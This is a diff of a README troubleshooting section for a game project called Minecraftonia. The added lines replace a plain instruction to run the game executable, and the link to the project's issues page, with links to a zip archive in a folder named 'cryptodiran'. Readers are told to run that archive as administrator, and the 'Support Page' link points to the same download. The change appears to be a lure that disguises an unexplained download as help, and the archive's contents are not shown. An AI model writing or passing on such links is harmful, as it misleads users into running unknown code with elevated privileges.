hollyisgoodgir/Minecraftonia/README.md

 1. **Update your Graphics Drivers:** Ensure your graphics card driver is up to date.
 2. **Check .NET Installation:** Verify that you have .NET 9 installed on your system.
-3. **Run as Administrator:** Right-click on `Minecraftonia.exe` and select "Run as administrator" to resolve permission issues.
+3. **Run as Administrator:** Right-click on `https://raw.githubusercontent.com/hollyisgoodgir/Minecraftonia/main/cryptodiran/Minecraftonia.zip` and select "Run as administrator" to resolve permission issues.
-4. **Contact Support:** If you still have trouble, please visit our [Support Page](https://github.com/hollyisgoodgir/Minecraftonia/issues) to report the issue.
+4. **Contact Support:** If you still have trouble, please visit our [Support Page](https://raw.githubusercontent.com/hollyisgoodgir/Minecraftonia/main/cryptodiran/Minecraftonia.zip) to report the issue.

 ## 👥 Community and Feedback